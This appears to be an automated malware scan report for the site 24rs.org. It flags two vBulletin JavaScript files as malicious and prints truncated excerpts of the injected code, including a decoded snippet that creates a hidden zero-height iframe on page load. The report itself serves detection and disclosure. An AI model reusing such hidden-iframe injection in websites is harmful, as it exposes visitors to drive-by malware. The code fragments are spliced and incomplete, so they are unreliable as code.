Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=24rs.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.24rs.org/ | 200 OK Content-Length: 57404 Content-Type: text/html | clean |
http://www.24rs.org/forums/clientscript/vbulletin_global.js | 200 OK Content-Length: 51352 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!window.console || !console.firebug) { window.console = {}; var names = ["log", "debug", "info", "warn", "error", "assert", "dir", "dirxml", "group", "groupEnd", "time", "timeEnd", "count", "trace", "profile", "profileEnd"]; for (var i = 0; i < names.length; ++i) window.console[names[i]] = function() {}; } if (typeof YAHOO == "undefined") { function null_event() { this.fire = function() {}; this.subscribe = function() {}; }; } var SESSIONURL if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.24rs.org/forums/clientscript/vbulletin_menu.js | 200 OK Content-Length: 25305 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) vBulletin.add_event("vBmenuShow"); vBulletin.add_event("vBmenuHide"); function vB_Popup_Handler() { this.open_steps = 10; this.open_fade = false; this.active = false; this.menus = new Array(); this.activemenu = null; this.hidden_selects = new Array(); }; vB_Popup_Handler.prototype.activate = function(active) { this.active = active; console.log("vBmenu :: System Activated"); }; vB_Popup_Handler.prototype.register = func if(f)e(s);} Antivirus reports:
| ||
http://www.24rs.org/clientscript/vbulletin_md5.js?v=368 | 404 Not Found Content-Length: 954 Content-Type: text/html | clean |
http://www.24rs.org/test404page.js | 404 Not Found Content-Length: 954 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 24rs.org
Result:
GET / HTTP/1.1
Host: 24rs.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 24rs.org
Referer: http://www.google.com/search?q=24rs.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 24rs.org
Referer: http://www.google.com/search?q=24rs.org
Result:
The result is similar to the first query. There are no suspicious redirects found.